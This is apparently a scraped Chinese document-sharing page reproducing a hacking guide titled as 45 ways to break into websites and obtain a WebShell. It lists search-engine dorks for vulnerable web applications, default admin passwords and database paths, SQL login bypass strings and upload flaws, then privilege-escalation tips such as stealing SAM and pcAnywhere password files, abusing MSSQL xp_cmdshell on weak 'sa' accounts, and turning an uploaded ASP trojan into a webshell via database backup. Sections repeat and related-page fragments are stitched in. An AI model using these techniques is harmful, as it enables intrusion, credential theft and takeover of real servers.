搜档网
当前位置:搜档网 › 网站入侵及查看WebShell的45种方法

网站入侵及查看WebShell的45种方法

网站入侵及查看WebShell的45种方法
网站入侵及查看WebShell的45种方法

网站入侵45种方法,拿WebShell45种方法.

1.到GoogLe,搜索一些关键字,edit.asp? 韩国肉鸡为多,多数为MSSQL数据库!

2,

到Google ,site:https://www.sodocs.net/doc/db4182870.html, inurl:asp

3,

利用挖掘鸡和一个ASP木马.

文件名是login.asp

路径组是/manage/

关键词是went.asp

用'or'='or'来登陆

4,

关键字:Co Net MIB Ver 1.0网站后台管理系统

帐号密码为 'or'='or'

5.

动感购物系统

inurl:help.asp登陆,如未注册成为会员!

upLoad_bm1.asp和upLoad_c1.asp这两个随便选个,一般管理员都忽视了这2漏洞

6。

默认数据库地址blogdata/acblog.asa

关键字:acblog

7.

百度 /htdocs

注册里可以直接上传asa文件!

8.

/Database/#newasp.mdb

关键词:NewAsp SiteManageSystem Version

9.

用挖掘机

关键字:Powered by WEBBOY

页面:/upfile.asp

10.

baidu中搜索关键字Ver5.0 Build 0519

(存在上传漏洞)

11.

Upfile_Article.asp bbs/upfile.asp

输入关键字:powered by mypower ,

12.

inurl:winnt\system32\inetsrv\ 在google里面输入这个就可以找到很多网站

13.

现在GOOGLE搜索关键字 intitle:网站小助手inurl:asp

14.

键字:首页最新动态新手指南舞曲音乐下载中心经典文章玩家风采装备购买站内流言友情连接本站论坛

挖掘鸡的关键字添 setup.asp

15.

VBulletin论坛的数据库

默认数据库地址!

/includes/functions.php

工具:

1.网站猎手下载地址:百度 Google!

2.Google

关键字:

Powered by: vBulletin Version 3.0.1

Powered by: vBulletin Version 3.0.2

Powered by: vBulletin Version 3.0.3

其中一个就可以了

16.

1.打开百度或GOOGLE搜索,输入powered by comersus ASP shopping cart

open source。这是一个商场系统。

2.网站的最底部分,有个 Comersus Open Technologies LC。打开

看下~~comersus系统~

猜到,comersus.mdb. 是数据库名

数据库都是放在database/ 后的,

所以database/comersus.mdb

comersus_listCategoriesTree.asp换成database/comersus.mdb,

不能下载。

那样把前一个''store/''除去,再加上database/comersus.mdb 试试

17.

无忧传奇官方站点程序。

1、后台管理地址:http://您的域名/msmiradmin/

2、默认后台管理帐号:msmir

3、默认后台管理密码:msmirmsmir

数据库文件为 http://您的域名/msmirdata/msmirArticle.mdb

数据库连接文件为 ***********/Conn.asp

18.

百度里输入/skins/default/

最全的WEBSHELL提权大大全

WEBSHELL权限提升技巧 c: d: e:..... C:\Documents and Settings\All Users\「开始」菜单\程序\ 看这里能不能跳转,我们从这里可以获取好多有用的信息比如Serv-U的路径, C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\ 看能否跳转到这个目录,如果行那就最好了,直接下它的CIF文件,破解得到pcAnywhere 密码,登陆 c:\Program Files\serv-u\ C:\WINNT\system32\config\ 下它的SAM,破解密码 c:\winnt\system32\inetsrv\data\ 是erveryone 完全控制,很多时候没作限制,把提升权限的工具上传上去,然后执行 c:\prel C:\Program Files\Java Web Start\ c:\Documents and Settings\ C:\Documents and Settings\All Users\ c:\winnt\system32\inetsrv\data\ c:\Program Files\ c:\Program Files\serv-u\ C:\Program Files\Microsoft SQL Server\ c:\Temp\ c:\mysql\(如果服务器支持PHP) c:\PHP(如果服务器支持PHP) 运行"cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps"来提升权限 还可以用这段代码试提升,好象不是很理想的 如果主机设置很变态,可以试下在c:\Documents and Settings\All Users\「开始」菜单\程序\启动"写入bat,vbs等木马。 根目录下隐藏autorun.inf C:\PROGRAM FILES\KV2004\ 绑 D:\PROGRAM FILES\RISING\RAV\ C:\Program Files\Real\RealServer\ rar Folder.htt与desktop.ini 将改写的Folder.htt与desktop.ini,还有你的木马或者是VBS或者是什么,放到对方管理员最可能浏览的目录下 replace 替换法捆绑 脚本编写一个启动/关机脚本重起 删SAM 错 CAcls命令 FlashFXP文件夹Sites.dat Sites.dat.bak Stats.dat Stats.dat.bak Ring的权限提升21大法! 以下全部是本人提权时候的总结很多方法至今没有机会试验也没有成功,但是我是的确看见别人成功过

1433提权全教程

1433端口提权的过程 随着网络安全意识的提高,很多服务器的安全防范都非常严了,本人对web入侵是一巧不通就只会扫扫1433弱口令的服务器,于是研究一段时间,虽然进步不大,但是还是想把经验分享一下,正所谓授人以鱼不如授人以渔,而我现在正是告诉你打鱼的方法,下面就以一台服务器为例了,本例使用工具为SQL TOOLS 2.0,论坛有下,请自行搜索。插播不是广告的广告:该工具集成度高,简单的sql指令无须使用分离器,直接在此工具中执行即可,其文件管理功能非常强大,反正我用着太顺手了,推荐一下,本文原创发布于=华夏黑客同盟论坛=(https://www.sodocs.net/doc/db4182870.html,)广告完毕。 把扫到的ip和sa及口令填入连接后,用dos命令功能试试列目录 显示错误信息: Error Message:无法装载 DLL xplog70.dll 或该 DLL 所引用的某一 DLL。原因: 126(找不到指定的模块。)。 这种情况大家在提权过程中经验遇到啊,它是由于xplog70.dll这个文件被删除或者做了其他限制,导致出现这个错误的 这个错误的直接后果就是sql数据库的xp_cmdshell的存储过程无法使用,无法执行命令提权自然就无从说起了, 当然我们还可以考虑其他的存储过程如:sp_oacreate和sp_oamethod来直接添加帐号,或者使用沙盘指令来提权, 但这台服务器,这些功能都被限制了,还是考虑下恢复xplog70.dll了,测试上

传无法成功,这条路走不通了, 这时就考虑用到工具的文件管理功能了 看到了把,和windows的资源管理器一样好用,目录列出来了,搜索一下可以用来提权的东西吧,这里我们首先要去看看 sql的安装路径里的xplog70.dll文件是否存在 看到吧,xplog70.dll文件不见了,被删除了,xpweb70.dll也被改了名字了-. - 继续搜寻下其他盘看看还有什么东西

授渔之1433提权全教程

授渔之<一次1433端口提权的过程> 随着网络安全意识的提高,很多服务器的安全防范都非常严了,本人对web入侵是一巧不通就只会扫扫1433弱口令的服务器,于是研究一段时间,虽然进步不大,但是还是想把经验分享一下,正所谓授人以鱼不如授人以渔,而我现在正是告诉你打鱼的方法,下面就以一台服务器为例了,本例使用工具为SQL TOOLS 2.0,论坛有下,请自行搜索。插播不是广告的广告:该工具集成度高,简单的sql指令无须使用分离器,直接在此工具中执行即可,其文件管理功能非常强大,反正我用着太顺手了,推荐一下,本文原创发布于=华夏黑客同盟论坛=(https://www.sodocs.net/doc/db4182870.html,)广告完毕。 把扫到的ip和sa及口令填入连接后,用dos命令功能试试列目录 显示错误信息: Error Message:无法装载 DLL xplog70.dll 或该 DLL 所引用的某一 DLL。原因: 126(找不到指定的模块。)。 这种情况大家在提权过程中经验遇到啊,它是由于xplog70.dll这个文件被删除或者做了其他限制,导致出现这个错误的 这个错误的直接后果就是sql数据库的xp_cmdshell的存储过程无法使用,无法执行命令提权自然就无从说起了, 当然我们还可以考虑其他的存储过程如:sp_oacreate和sp_oamethod来直接添加帐号,或者使用沙盘指令来提权, 但这台服务器,这些功能都被限制了,还是考虑下恢复xplog70.dll了,测试上

传无法成功,这条路走不通了, 这时就考虑用到工具的文件管理功能了 看到了把,和windows的资源管理器一样好用,目录列出来了,搜索一下可以用来提权的东西吧,这里我们首先要去看看 sql的安装路径里的xplog70.dll文件是否存在 看到吧,xplog70.dll文件不见了,被删除了,xpweb70.dll也被改了名字了-. - 继续搜寻下其他盘看看还有什么东西

获得网站WEBSHELL权限的截图0

获得网站WEBSHELL权限 一、学习目标:在得到了管理员帐号的情况下,进入网站的管理员后台,以备份数据库得到WEBSEHLL。 二、知识要点:在入侵网站之前,信息搜集是第一步,任何情况的搜集,当情况搜集有初步成果之后,应该首先试图获得管理员的帐号和密码,然后找出网站的后台(看管理员在后台的什么地方),对于现成的整站系统而言,通常后台是固定的,只要搞到网站就能以管理员的帐号进入。进了后台,就有了能力对网站进行操作,我们就有了很大的把握获得的一个WEBSEHLL。所谓WEBSEHLL,也就是一个脚本,这个脚本,具有可以管理WEB、修改主页内容的权限,如果要修改别人的主页,一般都需要这个权限(上传漏洞要得到的也是这个权限)。它可对网站的任何文件进行编辑,移动,复制,删除。如果某个服务器权限设置得不好,那么通过webshell可以得到该服务器的最高权限----即可以得到的是整个网站的操作权限,并且是进一步渗透获得主机权限的立脚点。 在进入管理后台后,获得WEBSHELL的首选方法是通过"备份数据库"的方法上传一个扩展名改成GIF的ASP木马,(之所以要把ASP的木马护展名由ASP改为GIF,是因为一般网站都有检测护展名,当检测到护展名为ASP时就不会允许上传),上传之后,用备份数据库的办法,把GIF护展名,备份成为ASP护展名,然后连接备份后的ASP地址,就能打开你上传的ASP木马,一个WEBSEHLL就到手了。具体方法为在备份数据库地址里输入你上传的GIF文件的相对地址,在恢复地址里输入你要生成的ASP地文件的路径和文件名,然后恢复数据库即可。 三、实验步骤 1、IE浏览器中输入https://www.sodocs.net/doc/db4182870.html,/bbsxp1(之前已经通过某方法得到网站后台管理员的用户名、口令)。 (1)以管理员身份登录网站前台,如图1。 图1 (2)在图2界面中进入ACCESS数据库管理,并在图3界面中输入后台管理员密码完成登录。

九种经典的Webshell提权

说到花了九牛二虎的力气获得了一个webshell, 当然还想继续获得整个服务器的admin权限,正如不想得到admin的不是好黑客~ 嘻嘻~~好跟我来,看看有什么可以利用的来提升权限 第一 如果服务器上有装了pcanywhere服务端,管理员为了管理方便 也给了我们方便,到系统盘的Documents and Settings/All Us ers/Application Data/Symantec/pcAnywhere/中下载*.cif本地 破解就使用pcanywhere连接就ok了 第二 有很多小黑问我这么把webshell的iis user权限提升 一般服务器的管理都是本机设计完毕然后上传到空间里, 那么就会用到ftp,服务器使用最多的就是servu 那么我们就利用servu来提升权限 通过servu提升权限需要servu安装目录可写~ 好开始把,首先通过webshell访问servu安装文件夹下的ServUDaemon.ini把他下载下来,然后在本机上安装一个servu把ServUDaemon.ini放到本地安装文件夹下覆盖,启动servu添加了一个用户,设置为系统管理员,目录C:\,具有可执行权限 然后去servu安装目录里把ServUDaemon.ini更换服务器上的。 用我新建的用户和密码连接~ 好的,还是连上了 ftp ftp>open ip Connected to ip. 220 Serv-U FTP Server v5.0.0.4 for WinSock ready... User (ip:(none)): id //刚才添加的用户 331 User name okay, please send complete E-mail address as password. Password:password //密码 230 User logged in, proceed. ftp> cd winnt //进入win2k的winnt目录 250 Directory changed to /WINNT ftp>cd system32 //进入system32目录 250 Directory changed to /WINNT/system32 ftp>quote site exec net.exe user rover rover1234 /add //利用系统的net.exe 文件加用户。 如果提示没有权限,那我们就 把后门(server.exe)传他system32目录 然后写一个VBs教本 set wshshell=createobject ("wscript.shell") a=wshshell.run ("cmd.exe /c net user user pass /add",0) b=wshshell.run ("cmd.exe /c net localgroup Administrators user /add",0) b=wshshell.run ("cmd.exe /c server.exe",0)

(零基础)手工注入+burpsuite拿webshell

之前由于不会安装vm版的bt5而在网上求救,结果认识了一找不到片的基友,00后的,,感觉顿时无语了…………聊天时,他说sqlmap 和burpsuite都很强大…………玩完sqlmap后,就一直想学burpsuite来着,,但是一直都没学,这几天才刚开始完的…………感觉确实强大,能够拦截,查看和修改网站流量………………不废话,开始 目标站,https://www.sodocs.net/doc/db4182870.html,(不要问我怎么找的……百度高级搜索inurl:asp?id=XX) 点一链接,在网站后加 and 1=1 回车,页面正常,,加and 1=2 ,回车,不正常,,,判断存在sql 注入漏洞(当然存在啊,不然怎么做教程,只是说下如何判断注入) 然后order by 查询字段(是叫做字段吗,我对概念不清楚,虽然我为这还自学了mysql……暂且叫字段吧) 如图,12不正常,11正常,说明字段为11(11之前的都正常)

然后在地址后加入 union select 1,2,3,4,5,6,7,8,9,10,11 from admin,也就是访问 https://www.sodocs.net/doc/db4182870.html,/show_content.asp?id=1361 union select 1,2,3,4,5,6,7,8,9,10,11 from admin(别问我admin哪来的,,微软access数据库默认的表,也不能说是默认的吧,大多都是这样,下面的username和password也是这样),看图吧 看到2 3 没,爆出查询点了,,把2换成username,3换成password(当然2换成password,3为username也行),回车,如图 username为admin,,密码为MD5加密的值,拿去解密,如图

【CN109905385A】一种webshell检测方法、装置及系统【专利】

(19)中华人民共和国国家知识产权局 (12)发明专利申请 (10)申请公布号 (43)申请公布日 (21)申请号 201910123769.5 (22)申请日 2019.02.19 (71)申请人 中国银行股份有限公司 地址 100818 北京市西城区复兴门内大街1 号 (72)发明人 俞学浩 蔡传智 王倩  (74)专利代理机构 北京三友知识产权代理有限 公司 11127 代理人 李辉 (51)Int.Cl. H04L 29/06(2006.01) G06F 17/27(2006.01) (54)发明名称 一种webshell检测方法、 装置及系统(57)摘要 本说明书实施例公开了一种webshell检测 方法、装置及系统,所述方法包括获取待检测网 页的PHP脚本数据对应的第一中间字节码数据; 利用构建的监督学习算法对所述第一中间字节 码数据进行识别,获得所述待检测网页的 webshell检测结果,其中,所述监督学习算法包 括对确定为webshell的PHP脚本数据以及确定为 正常的PHP脚本数据对应的第二中间字节码数据 进行训练得到的webshell检测模型。利用本说明 书各实施例,可以提高PHP webshell检测的准确 性。权利要求书2页 说明书13页 附图3页CN 109905385 A 2019.06.18 C N 109905385 A

权 利 要 求 书1/2页CN 109905385 A 1.一种webshell检测方法,其特征在于,包括: 获取待检测网页的PHP脚本数据对应的第一中间字节码数据; 利用构建的监督学习算法对所述第一中间字节码数据进行识别,获得所述待检测网页的webshell检测结果,其中,所述监督学习算法包括对确定为webshell的PHP脚本数据以及确定为正常的PHP脚本数据对应的第二中间字节码数据进行训练得到的webshell检测模型。 2.根据权利要求1所述的方法,其特征在于,所述利用构建的监督学习算法对所述第一中间字节码数据进行识别,包括: 基于预设的分词库,利用TF-IDF算法对所述第一中间字节码数据进行特征提取,获得所述待检测网页的特征数据,其中,所述分词库包括对确定为webshell的PHP脚本数据以及确定为正常的PHP脚本数据对应的第二中间字节码数据进行分词处理后获得分词数据; 利用构建的监督学习算法对所述待检测网页的特征数据进行识别。 3.根据权利要求2所述的方法,其特征在于,所述利用TF-IDF算法对所述第一中间字节码数据进行特征提取,包括: 将所述第一中间字节码数据进行分词处理,获得所述待检测网页的PHP脚本数据对应的第一分词集合; 利用TF-IDF算法计算所述分词库中每个词相对所述第一分词集合的TF-IDF值; 将所述TF-IDF值按照相应的词在分词库中的位置进行一一对应,获得由TF-IDF值组成的向量,将该向量作为所述待检测网页的特征向量。 4.根据权利要求2或3所述的方法,其特征在于,所述预设的分词库采用下述方式构建: 获取确定为webshell的PHP脚本数据以及确定为正常的PHP脚本数据,获得样本集合; 将所述样本集合中的各脚本数据转换成中间字节码数据,获得各脚本数据对应的第二中间字节码数据; 对所述第二中间字节码数据进行分词处理,获得各脚本数据对应的第二分词集合; 将所述第二分词集合进行融合处理,获得分词库。 5.根据权利要求4所述的方法,其特征在于,所述webshell检测模型采用下述方式训练得到: 利用TF-IDF算法计算所述分词库中每个词相对所述第二分词集合的TF-IDF值,获得相应脚本数据的特征向量; 利用监督学习算法对所述确定为webshell的PHP脚本数据以及确定为正常的PHP脚本数据所对应的特征向量进行学习,获得webshell检测模型。 6.根据权利要求1所述的方法,其特征在于,所述待检测网页的webshell检测结果包括待检测网页是否属于webshell网页或者属于webshell网页的概率。 7.一种webshell检测装置,其特征在于,所述装置包括: 数据获取模块,用于获取待检测网页的PHP脚本数据对应的第一中间字节码数据; 检测模块,用于利用构建的监督学习算法对所述第一中间字节码数据进行识别,获得所述待检测网页的webshell检测结果,其中,所述监督学习算法包括对确定为webshell的PHP脚本数据以及确定为正常的PHP脚本数据对应的第二中间字节码数据进行训练得到的webshell检测模型。 2

服务器提权的介绍和方法

现在可以说网络管理员对服务器的设置是越来越BT,但BT的同时,也有黑客朋友们对服务器的不断的测试,在测试中往往获取最低的guest权限是简单的,像我们在入侵网站过程中,获取webshell是简单的,但是当由webshell的guest权限向system权限提升时却往往是止步不前。所以我有想写这样一篇文章的想法,但是在思考的过程中,又不得不承认,方法是不断的探索中出来的,方法更是有常规的也有另辟蹊径的。下面就做一些简单的介绍,对提权的方法进行一些介绍,同时也希望在更多朋友的不断回复中能够丰富我们的方法。 首先要说明的是,过早的一些漏洞我们就不再多说了,只说一些现在可以见到的吧。还有就是本文的题目是webshell下的服务器提权方法。 下面我们就进入主题,对webshell的提权方法! 首先我们要明确的是,提权一般是依靠主机所开通的服务,利用服务存在的漏洞和管理员设置的疏忽进行提权的,不过也不排除一些SB的管理员对服务器设置的似乎没有"穿衣服".下面就是针对一些常见的服务进行的提权方法。 在获取webshell后,我们常见的是看一下系统的服务,查看服务可以通过利用扫描器对服务器ip进行扫描,或是在webshell中有执行dos命令时查看net start来查看主机所开放的服务。首先我们说一下从简单的开始说起: 1.pcanywhere的提权方法 pcanywhere软件我想大家都了解,为什么将它放在首位就是因为读取密码后直接连接就可以了,如果对方主机在开通了pcanywhere的服务端的话,我们看能否跳转到这个目录C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\,如果行那就最好了,直接下载它的CIF文件,然后使用pcanywhere的密码读取器得到pcAnywhere密码,然后使用pcanywhere登陆即可!接下来就是可视化操作了。 2.Serv-U提权方法 Serv-u可以说是网络上比较火的一款FTP服务器软件,有许多像我这样的小黑们都是看系统服务中是否有Serv-u的系统进程来进行提权的。Serv-u的提权方法针对不同的版本也有不同的方法,这里我们就列举一二,可能不是很全,但在其他网友的回复中能够不断的补充吧! a.serv-U本地提权:serv-U本地提权一般是利用溢出程序对serv-u的设置上的缺陷进行添加超级账户的功效。例如Xiaolu写的serv-u.exe就是利用sevr-u的默认管理端口,管理员账号和密码进行提权的,默认本地管理端口是:43958,默认管理员:LocalAdministrator,默认密码:#l@$ak#.lk;0@P,这是集成在Serv-u内部的,可以以Guest权限来进行连接,对Serv-u进行管理,利用本地提权的关键就是寻找服务器文件目录中的everyone权限目录,下面我给大家列举些常见的everyone权限目录: c:\winnt\system32\inetsrv\data\ 是erveryone 完全控制,很多时候没作限制,把提升权限的工具上传上去,然后执行c:\prel C:\Program Files\Java Web Start\ c:\Documents and Settings\ C:\Documents and Settings\All Users\Documents\ 很多时候data目录不行,试试这个很多主机都是erveryone 完全控制! C:\Program Files\Microsoft SQL Server\ c:\Temp\ c:\mysql\(如果服务器支持PHP)

最全的WEBSHELL提权方法总结

最全的WEBSHELL提权方法总结 在得到了一个Webshell之后,如果能进一步利用系统的配置不当取得更高的权限,一直是广大黑友们所津津乐道的话题,也是高手和菜鸟间最大的区别。本文将从一个大角度总括当前流行的各种提权方法,希望对大家有所启发,起到一个抛砖引玉的作用 WEBSHELL权限提升技巧 c: d: e:..... C:\Documents and Settings\All Users\「开始」菜单\程序\ 看这里能不能跳转,我们从这里可以获取好多有用的信息比如Serv-U的路径, C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\ 看能否跳转到这个目录,如果行那就最好了,直接下它的CIF文件,破解得到pcAnywhere密码,登陆c:\Program Files\serv-u\ C:\WINNT\system32\config\ 下它的SAM,破解密码 c:\winnt\system32\inetsrv\data\ 是erveryone 完全控制,很多时候没作限制,把提升权限的工具上传上去,然后执行 c:\prel C:\Program Files\Java Web Start\ c:\Documents and Settings\ C:\Documents and Settings\All Users\ c:\winnt\system32\inetsrv\data\ c:\Program Files\ c:\Program Files\serv-u\ C:\Program Files\Microsoft SQL Server\ c:\Temp\ c:\mysql\(如果服务器支持PHP) c:\PHP(如果服务器支持PHP) 运行"cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps"来提升权限 还可以用这段代码试提升,好象不是很理想的 如果主机设置很变态,可以试下在c:\Documents and Settings\All Users\「开始」菜单\程序\启动"写入bat,vbs等木马。 根目录下隐藏autorun.inf C:\PROGRAM FILES\KV2004\ 绑 D:\PROGRAM FILES\RISING\RA V\ C:\Program Files\Real\RealServer\ rar Folder.htt与desktop.ini 将改写的Folder.htt与desktop.ini,还有你的木马或者是VBS或者是什么,放到对方管理员最可能浏览的目录下 replace 替换法捆绑 脚本编写一个启动/关机脚本重起 删SAM :( 错 CAcls命令

1433提权详解

1433提权详解!!! 随着网络安全意识的提高,很多服务器的安全防范都非常严了,本人对web入侵是一巧不通就只会扫扫1433弱口令的服务器,于是研究一段时间,虽然进步不大,但是还是想把经验分享一下,正所谓授人以鱼不如授人以渔,而我现在正是告诉你打鱼的方法,下面就以一台服务器为例了,本例使用工具为SQL TOOLS 2.0,论坛有下,请自行搜索。插播不是广告的广告:该工具集成度高,简单的sql指令无须使用分离器,直接在此工具中执行即可,其文件管理功能非常强大,反正我用着太顺手了,推荐一下,本文原创发布于=华夏黑客同盟论坛=(https://www.sodocs.net/doc/db4182870.html,)广告完毕。 把扫到的ip和sa及口令填入连接后,用dos命令功能试试列目录 显示错误信息: Error Message:无法装载 DLL xplog70.dll 或该 DLL 所引用的某一 DLL。原因: 126(找不到指定的模块。)。 这种情况大家在提权过程中经验遇到啊,它是由于xplog70.dll这个文件被删除或者做了其他限制,导致出现这个错误的 这个错误的直接后果就是sql数据库的xp_cmdshell的存储过程无法使用,无法执行命令提权自然就无从说起了, 当然我们还可以考虑其他的存储过程如:sp_oacreate和sp_oamethod来直接添加帐号,或者使用沙盘指令来提权, 但这台服务器,这些功能都被限制了,还是考虑下恢复xplog70.dll了,测试上

传无法成功,这条路走不通了, 这时就考虑用到工具的文件管理功能了 看到了把,和windows的资源管理器一样好用,目录列出来了,搜索一下可以用来提权的东西吧,这里我们首先要去看看 sql的安装路径里的xplog70.dll文件是否存在 看到吧,xplog70.dll文件不见了,被删除了,xpweb70.dll也被改了名字了-. - 继续搜寻下其他盘看看还有什么东西

对服务器进行提权的方法

对服务器进行提权的方法 文章录入:责任编辑: 84 【字体:小大】 现在可以说网络管理员对服务器的设置是越来越BT,但BT的同时,也有黑客朋友们对服务器的不断的测试,在测试中往往获取最低的guest权限是简单的,像我们在入侵网站过程中,获取webshell是简单的,但是当由webshell的guest权限向system权限提升时却往往是止步不前。所以我有想写这样一篇文章的想法,但是在思考的过程中,又不得不承认,方法是不断的探索中出来的,方法更是有常规的也有另辟蹊径的。下面就做一些简单的介绍,对提权的方法进行一些介绍,同时也希望在更多朋友的不断回复中能够丰富我们的方法。 首先要说明的是,过早的一些漏洞我们就不再多说了,只说一些现在可以见到的吧。还有就是本文的题目是webshell下的服务器提权方法。 下面我们就进入主题,对webshell的提权方法! 首先我们要明确的是,提权一般是依靠主机所开通的服务,利用服务存在的漏洞和管理员设置的疏忽进行提权的,不过也不排除一些SB的管理员对服务器设置的似乎没有"穿衣服".下面就是针对一些常见的服务进行的提权方法。 在获取webshell后,我们常见的是看一下系统的服务,查看服务可以通过利用扫描器对服务器ip进行扫描,或是在webshell中有执行dos命令时查看net start来查看主机所开放的服务。首先我们说一下从简单的开始说起: 的提权方法 pcanywhere软件我想大家都了解,为什么将它放在首位就是因为读取密码后直接连接就可以了,如果对方主机在开通了pcanywhere的服务端的话,我们看能否跳转到这个目录C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\,如果行那就最好了,直接下载它的CIF文件,然后使用pcanywhere的密码读取器得到pcAnywhere 密码,然后使用pcanywhere登陆即可!接下来就是可视化操作了。

浅谈在WEBSHELL下如何运行命令

浅谈在WEBSHELL下如何运行命令 Author: kyo327 EMail: humour327@https://www.sodocs.net/doc/db4182870.html, Date: 2010-06-16 Thanks: 互联网 [ 目录 ] 0×00 前言 0×01 在asp环境下运行命令的方法 0×02在aspx环境下运行命令的方法 0×03在php环境下运行命令的方法 0×04 在jsp 环境下运行命令的方法 0×05 其他脚本环境下运行命令的方法 0×06 后记 0×00 前言 随着互联网的发展和互联网用户的快速增长,越来越多的应用都转向B/S 结构,因为它是跨平台的、易操作的、方便的、迅速的,这样不论用户使用什么样的操作系统,仅仅需要安装一个浏览器就能享受在线购物、网上支付、看电影、写博客等等各种各样便捷的服务,特别是WEB2.0时代的到来更增添了互联网的活力。但是这样就会导致越来越多的WEB安全问题的出现,比如sql注入、XSS、上传漏洞、弱口令、目录遍历等,虽然早在数十年前就被发现这些漏洞产生的根本原因,可它们却始终都没有退出历史的舞台,依然是WEB应用程序主要的安全问题,其实这也不是安全厂商和企业不重视安全,也许是恶意入侵者又从他们的安全解决方案里找到新的漏洞、也许是配合其他的漏洞形成一个不是漏洞的漏洞、也许是服务器配置方面出现了问题、也许是出于对用户的信任(因为不是所有的用户都是循规蹈矩的)、再或许是由新增加应用导致的。总之还是一句话,安全是一个整体。

*************************************************************** 这里插播个广告,黑友们请无视,只是为朋友的网站能被搜索引擎收录,多加点流量。 https://www.sodocs.net/doc/db4182870.html, 返利网,淘你喜欢,淘宝返利,淘宝返现购物。 *************************************************************** 在当前这个时代,靠一个远程溢出直接获得一个SHELL对于一般的黑客来说是过于奢侈了,就算真的有传说中的80端口溢出,也要看目标值不值得用。所以一般来说大多数黑客还是从WEB应用入手。不论用什么方法吧,先拿到一个WEBSHELL是最基本的,哪怕仅仅是同C类网段的一台机器,起码可以试试ARP嗅探。而拿到一个WEBSHELL后,面临最多的一个问题就是提升权限。特别是在遇到虚拟主机的时候,当你的目标在另外一个目录,你没有办法进目标网站,仅仅是靠旁注进了同一服务器的其他站点,这种情况提权跨目录成了必经之路。但是要提升权限基本上都是要执行命令的,现在的大多数WEB服务器、虚拟主机等都做了安全设置,因此本文就谈一谈在各种脚本语言环境下都有哪些方法可以执行命令。(本文仅探讨服务器为windows的情况) 0×01 在asp环境下运行命令的方法 当拿到一个asp的WEBSHELL时,想运行命令,一般是先查看一下组件支持情况。如图1

网站入侵及查看WebShell的45种方法

网站入侵45种方法,拿WebShell45种方法. 1.到GoogLe,搜索一些关键字,edit.asp? 韩国肉鸡为多,多数为MSSQL数据库! 2, 到Google ,site:https://www.sodocs.net/doc/db4182870.html, inurl:asp 3, 利用挖掘鸡和一个ASP木马. 文件名是login.asp 路径组是/manage/ 关键词是went.asp 用'or'='or'来登陆 4, 关键字:Co Net MIB Ver 1.0网站后台管理系统 帐号密码为 'or'='or'

5. 动感购物系统 inurl:help.asp登陆,如未注册成为会员! upLoad_bm1.asp和upLoad_c1.asp这两个随便选个,一般管理员都忽视了这2漏洞 6。 默认数据库地址blogdata/acblog.asa 关键字:acblog 7. 百度 /htdocs 注册里可以直接上传asa文件! 8. /Database/#newasp.mdb 关键词:NewAsp SiteManageSystem Version

9. 用挖掘机 关键字:Powered by WEBBOY 页面:/upfile.asp 10. baidu中搜索关键字Ver5.0 Build 0519 (存在上传漏洞) 11. Upfile_Article.asp bbs/upfile.asp 输入关键字:powered by mypower , 12. inurl:winnt\system32\inetsrv\ 在google里面输入这个就可以找到很多网站 13. 现在GOOGLE搜索关键字 intitle:网站小助手inurl:asp 14.

后门木马隐藏技术—webshell的隐藏

后门木马隐藏技术—webshell的隐藏 比较笨的方法就是找一些比较深或者比较隐蔽的地方放自己的ASP木马,这个就不用我说了吧。 下面这些方法,只要大家利用好,做个隐藏的ASP后门是不成问题的。 1.插马法 其实,我们可以直接把一句话插入已经存在的页面了,但是,问题出来了,像常用的 1<%execute(request("a"))%> 2<%execute(request("value"))%> 3<%eval request("#")%> 4<%if request("cnxhacker")<>"" then Session("b")=request("cnxhacker") 5if Session("b")<>"" then execute Session("b")%> 等等,这些一句话一插进去的话,就会报错,一下就会被发现...其实,我们忽略了一个天天在用的S端 冰狐的一句话客户端,这个调用的是Javascript脚本,跟调用Vbscript不同,Javascript是运行在客户端的,也就上一HTML端,所以我们可以直接把他插入在页面中,而不报错。这样,就达到了隐藏后门的技术。(建议大家找个比较大的页面,随便插在,,这些标签后门都可以的) 2.建立非标准目录 这个只要有CMDshell 就可以了,当然提权最好。直接在站点跟目录下建立个文件夹,DOS法:md adai.. 然后在拷贝自己的木马到这个目录下,比如木马在d:\web\wind.asp 就把他拷贝到d:\web\adai..\wind.asp 这样,也可以起到隐藏作用。 3.include调用法 知道最近出了个动易的ODAY么,就是利用03服务器的IIS解析的漏洞,我给大家讲解下,03服务器会对asp的文件进行解析,这样就可以达到我们隐藏后门的技术了,大家会经常看到 6: 之类的代码吧,OK,咱们就利用这个方法来隐藏。 先建立个普通的asp文件夹(记着,是文件夹),例如adai.asp,然后再在adai.asp里面建立个图片文件如adai.jpg。在里面插入一句话代码。然后在建立个文本文件如wind.txt,接着在wind.txt里插入:。这样咱们在访问站点的wind.txt时,就是我们的一句话后门了,有些菜鸟可能会问 7 是ASP的内容,怎么能在JPG里生效呢?我刚才不是说了么,03服务器的IIS会解析asp文件么。所以我们在访问adai.jpg时,他就误认为在访问wind.asp了。这种方法在隐藏方面也是很不错的,大家可

相关主题